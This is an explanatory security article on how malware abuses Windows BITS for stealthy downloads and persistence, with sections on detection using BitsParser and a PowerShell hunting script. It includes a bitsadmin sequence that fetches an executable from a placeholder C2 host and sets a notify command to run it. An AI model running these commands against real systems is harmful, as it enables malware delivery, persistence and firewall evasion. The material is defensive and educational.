What Is The Background Intelligent Transfer Service
In recent months, cybercrime gangs have been abusing the Windows Background Intelligent Transfer Service (BITS) in their malware as a way of masking their operations.
In this article we look at what BITS is, how malware uses it for nefarious purposes, and how activity of this kind can be prevented and detected.
What is Windows Background Intelligent Transfer Service?
BITS is a service available on the Windows operating system and the default mechanism through which Microsoft delivers Windows updates to users all over the world. Applications and system components, including Windows Update, use BITS to deliver operating system and application updates so that they can be downloaded with minimal disruption to the user.
Figure 1: BITS service and its configuration (automatic startup mode).
BITS works with jobs, each of which contains one or more files to download or upload, depending on the application that created it. The BITS service runs inside a service host process (svchost.exe) and schedules transfers such as the well-known Windows updates. Information about jobs, files and their states is stored in a local database, the BITS queue manager (QMGR) database, rather than in the registry. On Windows 10 it lives in C:\ProgramData\Microsoft\Network\Downloader\qmgr.db; earlier versions keep it in qmgr0.dat and qmgr1.dat in the same folder.
How criminals are using BITS
The abuse of BITS in the wild by criminal groups is not new. For example, a backdoor used by the Stealth Falcon group takes advantage of this service to communicate with its C2 server.
ESET's research team reported that the Win32/StealthFalcon backdoor did not communicate with its remote server via classic HTTP or HTTPS requests but hid its C&C traffic inside BITS.
BITS was designed to work together with Windows applications and to download and upload data in the background without disturbing the user. Because of this, it is useful for evading firewalls that block unknown processes from reaching the network: the connection is made by the BITS service host, not by the malware, so it also masks which application is actually requesting or downloading data from the internet.
One of the most powerful features is that BITS transfers are asynchronous: the application that created a job need not be running when the requested transfers complete, and jobs survive reboots and are retried for up to 90 days by default. Criminals have used this behaviour as a method of keeping malicious applications persistent on a machine for a long time.
Another key point from the criminal's point of view is how the data is kept. Because job data is stored in the QMGR database instead of in traditional registry locations, many tools and forensic analysts do not pay attention to it and so fail to identify malicious persistence via BITS early.
Downloading the malicious binary
BITS commands can be hard-coded inside malware, PowerShell loaders and so on. Jobs can be created through API calls (the IBackgroundCopyManager COM interface), via the bitsadmin command-line tool, or with the BitsTransfer PowerShell module. Figure 2 shows how a malicious file named "malware.exe" could be retrieved from an HTTPS C2 server and stored in the C:\Windows folder.
Figure 2: Using bitsadmin to create a job that downloads a malicious executable and stores it as C:\Windows\malware.exe.
Figure 3: Malicious file downloaded into the C:\Windows folder.
Creating persistence
One method of creating persistence on the target machine is to set a notification command line on the job, as presented in Figure 4 below: when the job reaches the configured state (transferred or error), BITS itself launches the given program.
Figure 4: Creating persistence on the target machine via BITS.
With this method in place, several groups have created persistence, evaded firewalls and avoided detection using nothing but BITS. For example, many past incidents involved Ryuk ransomware operators leveraging custom backdoors and loaders to actively target hospitals and other medical support centers.
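The bitsadmin sequence behind Figures 2 and 4, written out as an added example (this is a reconstruction with placeholder values, not the article's own figures). The job name, the C2 URL (c2.example.invalid), the local path and the program launched by the notification are all assumptions for illustration; the switches themselves are standard bitsadmin options.

```powershell
# Added example, not the article's own commands. Placeholder values only:
$jobName = 'WindowsUpdateCheck'                        # assumed: a benign-looking job name
$remote  = 'https://c2.example.invalid/malware.exe'   # assumed: placeholder C2 URL
$local   = 'C:\Windows\malware.exe'                    # the path used in the article's Figure 2

# 1. Create a download job. The job is recorded in the QMGR database and
#    survives the exit of this shell and a reboot of the machine.
bitsadmin /create $jobName

# 2. Queue the file. Nothing is transferred until the job is resumed; while
#    transferring, BITS writes to a BIT*.tmp file next to the target path and
#    only renames it to the final name when the job is completed.
bitsadmin /addfile $jobName $remote $local

# 3. Persistence (Figure 4): ask BITS to run a command when the job changes
#    state. Flags 1 = transferred, 2 = error, so 3 fires on either. The
#    program is started by the BITS service, not by the shell that created it.
bitsadmin /SetNotifyFlags   $jobName 3
bitsadmin /SetNotifyCmdLine $jobName 'C:\Windows\System32\cmd.exe' "/c bitsadmin /complete $jobName & $local"

# 4. Start the transfer. The connection comes from svchost.exe, which is why
#    a process-based firewall rule for the malware does not see it.
bitsadmin /resume $jobName

# What a defender sees afterwards: the job, its files and the notify command.
bitsadmin /info $jobName /verbose
bitsadmin /getnotifycmdline $jobName
```

The notify command line above is the part that turns a one-off download into persistence: as long as the job exists in the queue, the service will run it on completion or error, regardless of which user is logged on and with no registry Run key or scheduled task to find.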
Tackling security problems with BITS
BITS is a powerful service and is often used by criminals to bypass firewalls, because organizations tend to ignore BITS traffic, knowing that it carries software updates, and treat it as background noise on the network.
Another advantage for the attacker is that BITS transfers run with idle bandwidth and can be throttled or paused while the user is actively using the machine, resuming only during idle periods. With this in mind, the chance of a human noticing the activity is minimal, although the malware can still be detected by proper security solutions when it modifies the registry, other BITS settings or scheduled tasks, and the BITS queue and event logs themselves can be inspected.
FireEye worked along these lines and released a tool called BitsParser. In short, the tool parses the BITS QMGR database and returns information about the jobs executed on endpoint systems. After that, the analyst looks through the results to identify any malicious artifact, such as a download from an unexpected host or a notification command line, or an abnormal schedule.
Figure 5: GitHub page of BitsParser and tool usage.
The results obtained after running the tool are easy to read and follow the format below:
Figure 6: Report generated after running the BitsParser tool.
BITS continues to be explored and abused by criminals in their malicious activities. For this reason, the BITS QMGR database is a useful source of data to consider during hunting operations.
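BitsParser works on the QMGR database offline. As an added example (my code, not part of the article or of FireEye's tool), the same hunt can be done on a live host with the built-in BitsTransfer module and the BITS-Client operational log: every job in the queue for every user is checked for a notification command line, for a remote host outside an allow-list, and for an executable target, and event 59 ("BITS started the ... transfer job that is associated with the ... URL") is used to recover URLs of jobs that have already left the queue. The allow-list and the extension pattern are assumptions to tune for your own environment; the cmdlets and the event ID are standard.

```powershell
# Added example: live hunting for suspicious BITS jobs. Run from an elevated
# shell so that Get-BitsTransfer -AllUsers can see every user's jobs.
Import-Module BitsTransfer

# Hosts that legitimately serve BITS downloads here (assumption; extend for
# your own update servers, CDNs and management tools).
$allowedHosts = @('*.windowsupdate.com', '*.microsoft.com', '*.windows.com')

function Test-AllowedUrl ([string]$Url) {
    try { $uri = [Uri]$Url } catch { return $false }
    foreach ($pattern in $allowedHosts) {
        if ($uri.Host -like $pattern) { return $true }
    }
    return $false
}

# 1. The live queue: jobs still present in the QMGR database.
function Find-SuspiciousBitsJob {
    Get-BitsTransfer -AllUsers | ForEach-Object {
        $job = $_
        $reasons = @()
        if ($job.NotifyCmdLine) {
            $reasons += "notify command: $($job.NotifyCmdLine)"
        }
        foreach ($file in $job.FileList) {
            if (-not (Test-AllowedUrl $file.RemoteName)) {
                $reasons += "remote: $($file.RemoteName)"
            }
            if ($file.LocalName -match '\.(exe|dll|ps1|bat|cmd|vbs|js)$') {
                $reasons += "executable target: $($file.LocalName)"
            }
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                JobId   = $job.JobId
                Name    = $job.DisplayName
                Owner   = $job.OwnerAccount
                State   = $job.JobState
                Created = $job.CreationTime
                Reasons = ($reasons -join '; ')
            }
        }
    }
}

# 2. History: completed or cancelled jobs are gone from the queue, but the
#    operational log keeps event 59 with the job name and the URL.
function Find-SuspiciousBitsHistory {
    $filter = @{ LogName = 'Microsoft-Windows-Bits-Client/Operational'; Id = 59 }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        if ($_.Message -match 'https?://\S+') {
            $url = $Matches[0].TrimEnd('.')
            if (-not (Test-AllowedUrl $url)) {
                [pscustomobject]@{ Time = $_.TimeCreated; Url = $url; Message = $_.Message }
            }
        }
    }
}

Find-SuspiciousBitsJob     | Format-Table -AutoSize
Find-SuspiciousBitsHistory | Format-Table -AutoSize
```

A job with a NotifyCmdLine set is the single strongest indicator here: legitimate Windows Update jobs do not use it, so any hit deserves a look at the program it launches before deciding whether the download itself was benign. For a disk image rather than a live host, point BitsParser at the qmgr.db (or qmgr0.dat/qmgr1.dat) file mentioned above instead.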
Sources
- How Attackers Use BITS, FireEye
- Cyber espionage using BITS, ZDNet
- Stealth Falcon group, ESET
- BITS command line, Segurança-Informática
Source: https://resources.infosecinstitute.com/topic/how-criminals-are-using-windows-background-intelligent-transfer-service/